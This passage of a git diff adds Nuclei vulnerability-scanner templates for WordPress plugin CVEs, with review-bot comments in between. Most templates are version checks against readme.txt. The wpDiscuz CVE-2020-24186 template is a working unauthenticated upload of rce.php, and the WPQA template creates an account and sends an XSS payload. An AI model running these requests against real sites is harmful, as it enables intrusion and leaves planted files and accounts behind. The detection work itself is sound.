tags: cve,wordpress,wp-plugin,jquery-manager,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/jquery-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "jquery-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.10.4') \ No newline at end of file diff --git a/poc/cve/CVE-2020-24186-4793.yaml b/poc/cve/CVE-2020-24186-4793.yaml new file mode 100644 index 0000000000..3889ec4b1a --- /dev/null +++ b/poc/cve/CVE-2020-24186-4793.yaml 
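Review bot: The description of the CVE-2020-11023 template says it is not verified that the plugin is exploitable through that CVE, yet the template reports `severity: medium`, so results will read as confirmed findings. Since the only evidence is the readme's `Stable tag` compared against `<= 1.10.4`, reporting it as informational would be more accurate, e.g. `severity: info` with a comment such as `# bundled jQuery version only; exploitability not verified`. The `shodan-query: 'vuln:CVE-2020-11023'` entry also appears to be keyed to the jQuery CVE in general rather than to this plugin.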
@@ -0,0 +1,83 @@ +id: CVE-2020-24186 + +info: + name: Unauthenticated File upload wpDiscuz WordPress plugin RCE + author: Ganofins + severity: critical + description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server. + reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md + tags: cve,cve2020,wordpress,wp-plugin,rce,upload + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2020-24186 + cwe-id: CWE-434 + +requests: + - raw: + - | + GET /?p=1 HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + X-Requested-With: XMLHttpRequest + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak + Origin: {{BaseURL}} + Referer: {{BaseURL}} + + ------WebKitFormBoundary88AhjLimsDMHU1Ak + Content-Disposition: form-data; name="action" + + wmuUploadFiles + ------WebKitFormBoundary88AhjLimsDMHU1Ak + Content-Disposition: form-data; name="wmu_nonce" + + {{wmuSecurity}} + ------WebKitFormBoundary88AhjLimsDMHU1Ak + Content-Disposition: form-data; name="wmuAttachmentsData" + + undefined + ------WebKitFormBoundary88AhjLimsDMHU1Ak + Content-Disposition: form-data; name="wmu_files[0]"; filename="rce.php" + Content-Type: image/png + + {{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}} + + ------WebKitFormBoundary88AhjLimsDMHU1Ak + Content-Disposition: form-data; name="postId" + + 1 + ------WebKitFormBoundary88AhjLimsDMHU1Ak-- + + extractors: + - type: regex + part: body + internal: true + name: wmuSecurity + group: 1 + regex: + - 'wmuSecurity":"([a-z0-9]+)' + + - type: regex + part: body + group: 1 + regex: + - '"url":"([a-z:\\/0-9-.]+)"' + + matchers-condition: and + matchers: + 
- type: status + status: + - 200 + + - type: word + words: + - 'success":true' + - 'fullname' + - 'shortname' + - 'url' + condition: and + part: body diff --git a/poc/cve/CVE-2020-35234-5026.yaml b/poc/cve/CVE-2020-35234-5026.yaml new file mode 100644 index 0000000000..9628bcfd78 --- /dev/null +++ b/poc/cve/CVE-2020-35234-5026.yaml @@ -0,0 +1,45 @@ +id: CVE-2020-35234 + +info: + name: SMTP WP Plugin Directory Listing + author: PR3R00T + severity: high + description: The WordPress Easy WP SMTP Plugin has its log folder remotely accessible and its content available for access. + impact: | + Low: Information disclosure + remediation: Upgrade to version 1.4.3 or newer and consider disabling debug logs. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-35234 + - https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/ + - https://wordpress.org/plugins/easy-wp-smtp/#developers + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2020-35234 + cwe-id: CWE-532 + epss-score: 0.37649 + epss-percentile: 0.97105 + cpe: cpe:2.3:a:wp-ecommerce:easy_wp_smtp:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 2 + vendor: wp-ecommerce + product: easy_wp_smtp + framework: wordpress + tags: cve2020,cve,wordpress,wp-plugin,smtp,wp-ecommerce + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/easy-wp-smtp/" + - "{{BaseURL}}/wp-content/plugins/wp-mail-smtp-pro/" + + matchers: + - type: word + words: + - "debug" + - "log" + - "Index of" + condition: and +# digest: 4a0a00473045022100b5b245278cf9f882c12ccd7f432d9ad044ce3e1d7d1040268987c3b0da6b38dc02206edf464d73fbe6176784b8e1f637bf87e468ab8a348d61afba6779c4abe0d4d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
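Review bot: The CVE-2020-24186 check writes a file to the target (`filename="rce.php"` in the `wmuUploadFiles` request) and nothing in the template marks it as state-changing, so it would run in an ordinary scan; the tags should include the marker, e.g. `tags: cve,cve2020,wordpress,wp-plugin,rce,upload,intrusive`. The uploaded file is not removed afterwards; the second extractor prints its URL, and a comment should tell the operator to delete that file once the scan is done. The description names only version 7.0.4 and there is no `remediation:` field, so a reader cannot tell from the template which release to upgrade to.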
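Review bot: In the CVE-2020-35234 template the second path, `/wp-content/plugins/wp-mail-smtp-pro/`, is a differently named plugin directory from the Easy WP SMTP plugin given in the description and `cpe`, so a directory listing there would be filed under this CVE for what looks like another product. The single matcher has no `part` and no status condition, and its words `debug`, `log` and `Index of` are generic enough to hit on unrelated listings. The metadata is also inconsistent: `severity: high` stands next to `impact: Low: Information disclosure`. Any edit will presumably invalidate the `# digest:` trailer copied with the file, so it would need re-signing or removal.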
diff --git a/poc/cve/CVE-2021-25111-5802.yaml b/poc/cve/CVE-2021-25111-5802.yaml
new file mode 100644
index 0000000000..506e3d7994
--- /dev/null
+++ b/poc/cve/CVE-2021-25111-5802.yaml
@@ -0,0 +1,26 @@
+id: CVE-2021-25111
+
+info:
+ name: English WordPress Admin < 1.5.2 - Unauthenticated Open Redirect
+ author: akincibor
+ severity: medium
+ description: The plugin does not validate the admin_custom_language_return_url before redirecting users o it, leading to an open redirect issue.
+ reference:
+ - https://wpscan.com/vulnerability/af548fab-96c2-4129-b609-e24aad0b1fc4
+ tags: wp-plugin,redirect,wordpress,wp,cve,cve2021,unauth
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-25111
+ cwe-id: CWE-601
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh"
+
+ matchers:
+ - type: regex
+ part: header
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/poc/cve/CVE-2022-1597-6652.yaml b/poc/cve/CVE-2022-1597-6652.yaml
new file mode 100644
index 0000000000..484e845f2c
--- /dev/null
+++ b/poc/cve/CVE-2022-1597-6652.yaml
@@ -0,0 +1,74 @@ +id: CVE-2022-1597 + +info: + name: WordPress WPQA <5.4 - Cross-Site Scripting + author: veshraj + severity: medium + description: | + WordPress WPQA plugin prior to 5.4 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter on its reset password form. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. + remediation: | + Upgrade WordPress WPQA to version 5.4 or later, which includes proper input sanitization to mitigate this vulnerability. + reference: + - https://wpscan.com/vulnerability/faff9484-9fc7-4300-bdad-9cd8a30a9a4e + - https://nvd.nist.gov/vuln/detail/CVE-2022-1597 + - https://github.com/trhacknon/Pocingit + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-1597 + cwe-id: CWE-79 + epss-score: 0.00188 + epss-percentile: 0.55258 + cpe: cpe:2.3:a:2code:wpqa_builder:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 2 + vendor: 2code + product: wpqa_builder + framework: wordpress + google-query: inurl:/wp-content/plugins/wpqa + tags: cve,cve2022,wpscan,xss,wordpress,wp-plugin,wp,wpqa,2code +variables: + user: "{{to_lower(rand_base(5))}}" + pass: "{{user}}{{to_lower(rand_base(3))}}" + redirect_to: '">' + +http: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 + Content-Type: application/x-www-form-urlencoded + + user_name={{user}}&email={{user}}@{{Host}}&pass1={{pass}}&pass2={{pass}}&phone={{rand_text_numeric(10)}}&agree_terms=on&form_type=wpqa-signup&action=wpqa_ajax_signup_process + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: 
{{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 + Content-Type: application/x-www-form-urlencoded + + user_mail={{user}}@{{Host}}&form_type=wpqa_forget&action=wpqa_ajax_password_process&redirect_to={{url_encode(redirect_to)}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{redirect_to}}' + - '"success":1' + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# digest: 4b0a00483046022100e783a69d637d8a9c688bd4ac063eb781edc4dc5bee41913dea8efc85ad0ace4f022100f5bf69553a1575c161fdb2198ca7005e5d232f990e81ef47b9b1684bfcffd3ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-1598-6654.yaml b/poc/cve/CVE-2022-1598-6654.yaml new file mode 100644 index 0000000000..a01f8dc4ee --- /dev/null +++ b/poc/cve/CVE-2022-1598-6654.yaml 
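Review bot: The first request of the CVE-2022-1597 template registers a new account on the scanned site through `wpqa_ajax_signup_process`, which changes state on the target, yet the `tags` line carries no `intrusive` marker and the account is left in place. Add `intrusive` to `tags` and a comment such as `# creates a user named by {{user}}; remove it after the scan` so operators can opt in and clean up. The description should also mention that the check depends on open registration, since the second request only makes sense once the signup succeeded (inferred from the request order). Editing the file will presumably invalidate the `# digest:` trailer at the end of the hunk.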
@@ -0,0 +1,53 @@
+id: CVE-2022-1598
+
+info:
+ name: WordPress WPQA <5.5 - Improper Access Control
+ author: veshraj
+ severity: medium
+ description: |
+ WordPress WPQA plugin before 5.5 is susceptible to improper access control. The plugin lacks authentication in a REST API endpoint. An attacker can potentially discover private questions sent between users on the site.
+ impact: |
+ This vulnerability can result in unauthorized access to sensitive information, potentially leading to data breaches or unauthorized actions.
+ remediation: |
+ Update the WPQA plugin to version 5.5 or later to fix the improper access control issue.
+ reference:
+ - https://wpscan.com/vulnerability/0416ae2f-5670-4080-a88d-3484bb19d8c8
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1598
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-1598
+ - https://github.com/20142995/Goby
+ - https://github.com/WhooAmii/POC_to_review
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2022-1598
+ cwe-id: CWE-306
+ epss-score: 0.01171
+ epss-percentile: 0.84672
+ cpe: cpe:2.3:a:2code:wpqa_builder:*:*:*:*:*:wordpress:*:*
+ metadata:
+ verified: true
+ max-request: 1
+ vendor: 2code
+ product: wpqa_builder
+ framework: wordpress
+ google-query: inurl:/wp-content/plugins/wpqa
+ tags: cve,cve2022,wordpress,wp-plugin,wpqa,idor,wpscan,2code
+
+http:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-json/wp/v2/asked-question'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"id":'
+ - '"rendered":'
+ condition: and
+
+ - type: status
+ status:
+ - 200
+# digest: 490a00463044022021b93d9ab57892fc1d94341d94f4826d6854e08a0fa9bce7672de506ae876a77022068edb87c27a2607cd497f6ca61cef522833220ba5ab8d5fba938d004f8ffa662:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/CVE-2023-24407.yaml b/poc/cve/CVE-2023-24407.yaml
new file mode 100644
index 0000000000..895f0f7ca1
--- /dev/null
+++ b/poc/cve/CVE-2023-24407.yaml @@ -0,0 +1,59 @@ +id: CVE-2023-24407-725d247a52bd9564ba0263d24a049d49 + +info: + name: > + Booking calendar, Appointment Booking System <= 3.2.3 - Missing Authorization + author: topscoder + severity: low + description: > + The Booking calendar, Appointment Booking System plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 3.2.3. This makes it possible for authenticated attackers, with Editor-level access and above, to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a3a5c4f2-22f6-45df-bf76-9dfa1d2f5f41?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:L + cvss-score: 4.1 + cve-id: CVE-2023-24407 + metadata: + fofa-query: "wp-content/plugins/booking-calendar/" + google-query: inurl:"/wp-content/plugins/booking-calendar/" + shodan-query: 'vuln:CVE-2023-24407' + tags: cve,wordpress,wp-plugin,booking-calendar,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/booking-calendar/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "booking-calendar" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.2.3') \ No newline at end of file diff --git a/poc/cve/CVE-2023-49196.yaml b/poc/cve/CVE-2023-49196.yaml new file mode 100644 index 0000000000..cb3853e083 --- /dev/null +++ b/poc/cve/CVE-2023-49196.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2023-49196-1f41ce4580ff2a6b6234baa60b4e1aca + +info: + name: > + PageLayer <= 1.7.7 - Cross-Site Request Forgery via pagelayer_load_plugin + author: topscoder + severity: medium + description: > + The Page Builder: Pagelayer – Drag and Drop website builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.7.7. This is due to missing or incorrect nonce validation on the pagelayer_load_plugin function. This makes it possible for unauthenticated attackers to disable the "getting started" promo via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3a0c8ecc-f0a1-41fa-a5f7-2d65d610efc0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2023-49196 + metadata: + fofa-query: "wp-content/plugins/pagelayer/" + google-query: inurl:"/wp-content/plugins/pagelayer/" + shodan-query: 'vuln:CVE-2023-49196' + tags: cve,wordpress,wp-plugin,pagelayer,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/pagelayer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "pagelayer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.7.7') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10010.yaml b/poc/cve/CVE-2024-10010.yaml new file mode 100644 index 0000000000..c2ef47f31a --- /dev/null +++ b/poc/cve/CVE-2024-10010.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-10010-951aa2e5ac7c686265be838ce5e0fe9f + +info: + name: > + LearnPress <= 4.2.7.1 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 4.2.7.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/68991289-acfa-4ab9-9852-755e5f1eda33?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-10010 + metadata: + fofa-query: "wp-content/plugins/learnpress/" + google-query: inurl:"/wp-content/plugins/learnpress/" + shodan-query: 'vuln:CVE-2024-10010' + tags: cve,wordpress,wp-plugin,learnpress,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/learnpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "learnpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.2.7.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10104.yaml b/poc/cve/CVE-2024-10104.yaml new file mode 100644 index 0000000000..2bc1572dae --- /dev/null 
+++ b/poc/cve/CVE-2024-10104.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10104-b84d2405dfa0880c1a70b2a3fad82d45 + +info: + name: > + Jobs for WordPress <= 2.7.7 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Jobs for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 2.7.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3bbe6b57-9c50-4515-aa62-a9d9a41bf4ce?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10104 + metadata: + fofa-query: "wp-content/plugins/job-postings/" + google-query: inurl:"/wp-content/plugins/job-postings/" + shodan-query: 'vuln:CVE-2024-10104' + tags: cve,wordpress,wp-plugin,job-postings,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/job-postings/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "job-postings" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.7.7') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10146.yaml b/poc/cve/CVE-2024-10146.yaml new file mode 100644 index 0000000000..ed7ce97858 --- /dev/null +++ b/poc/cve/CVE-2024-10146.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-10146-7c5ec1542ecba7c343e02aa01e7c0776 + +info: + name: > + Simple File List <= 6.1.11 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Simple File List plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via a URL in all versions up to, and including, 6.1.12 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/078b58df-ca2f-4c44-896b-f0e0f7d3bf2b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-10146 + metadata: + fofa-query: "wp-content/plugins/simple-file-list/" + google-query: inurl:"/wp-content/plugins/simple-file-list/" + shodan-query: 'vuln:CVE-2024-10146' + tags: cve,wordpress,wp-plugin,simple-file-list,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/simple-file-list/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "simple-file-list" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.1.12') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10471.yaml b/poc/cve/CVE-2024-10471.yaml new file mode 100644 index 0000000000..64646065f4 --- /dev/null +++ b/poc/cve/CVE-2024-10471.yaml 
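Review bot: The affected range is stated two ways in the CVE-2024-10146 template: the `name` says `<= 6.1.11`, while the description and the matcher `compare_versions(version, '<= 6.1.12')` use 6.1.12. One of the two is wrong, so either the title under-reports the range or the matcher flags a release that is already fixed. Check the bound against the referenced Wordfence advisory and make the name, description and `compare_versions` argument agree.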
@@ -0,0 +1,59 @@ +id: CVE-2024-10471-73a898dfd96211fb8e950b5570e3fb68 + +info: + name: > + Everest Forms <= 3.0.4.1 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Everest Forms – Build Contact Forms, Surveys, Polls, Quizzes, Newsletter & Application Forms, and Many More with Ease! plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.0.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7f6f1c16-afd6-4c69-8988-70c6c0105748?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-10471 + metadata: + fofa-query: "wp-content/plugins/everest-forms/" + google-query: inurl:"/wp-content/plugins/everest-forms/" + shodan-query: 'vuln:CVE-2024-10471' + tags: cve,wordpress,wp-plugin,everest-forms,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/everest-forms/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "everest-forms" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.0.4.1') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-10473.yaml b/poc/cve/CVE-2024-10473.yaml new file mode 100644 index 0000000000..8ce616a5d0 --- /dev/null +++ b/poc/cve/CVE-2024-10473.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10473-4bd3b2366c1ef349a8ea2852cdba87bd + +info: + name: > + Logo Slider <= 4.1.0 - Authenticated (Author+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Logo Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 4.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/fa1c526d-b751-4461-9e54-e7704ca8ddc3?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10473 + metadata: + fofa-query: "wp-content/plugins/cb-logo-slider/" + google-query: inurl:"/wp-content/plugins/cb-logo-slider/" + shodan-query: 'vuln:CVE-2024-10473' + tags: cve,wordpress,wp-plugin,cb-logo-slider,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cb-logo-slider/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cb-logo-slider" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.0') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-10480.yaml b/poc/cve/CVE-2024-10480.yaml new file mode 100644 index 0000000000..b888bbbff3 --- /dev/null +++ b/poc/cve/CVE-2024-10480.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10480-c478c5a474eb7197d1a2e40d153a7824 + +info: + name: > + 3DPrint Lite <= 2.0.9.9 - Cross-Site Request Forgery to Settings Update + author: topscoder + severity: medium + description: > + The 3DPrint Lite plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.9.9. This is due to missing or incorrect nonce validation on the 'p3dlite_settings' action. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0c29e242-b05c-4876-8948-1278982d6fbc?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-10480 + metadata: + fofa-query: "wp-content/plugins/3dprint-lite/" + google-query: inurl:"/wp-content/plugins/3dprint-lite/" + shodan-query: 'vuln:CVE-2024-10480' + tags: cve,wordpress,wp-plugin,3dprint-lite,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/3dprint-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "3dprint-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.9.9') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-10493.yaml b/poc/cve/CVE-2024-10493.yaml new file mode 100644 index 0000000000..3d710b17bf --- /dev/null +++ b/poc/cve/CVE-2024-10493.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-10493-0ea5d1ba204f4cd4e380f96698fb397e + +info: + name: > + Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid, Carousel and Remote Arrows) <= 5.10.2 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid, Carousel and Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Lightbox' block in all versions up to, and including, 5.10.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5b77982e-15ab-4376-89d3-7a2609b118eb?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10493 + metadata: + fofa-query: "wp-content/plugins/bdthemes-element-pack-lite/" + google-query: inurl:"/wp-content/plugins/bdthemes-element-pack-lite/" + shodan-query: 'vuln:CVE-2024-10493' + tags: cve,wordpress,wp-plugin,bdthemes-element-pack-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bdthemes-element-pack-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" 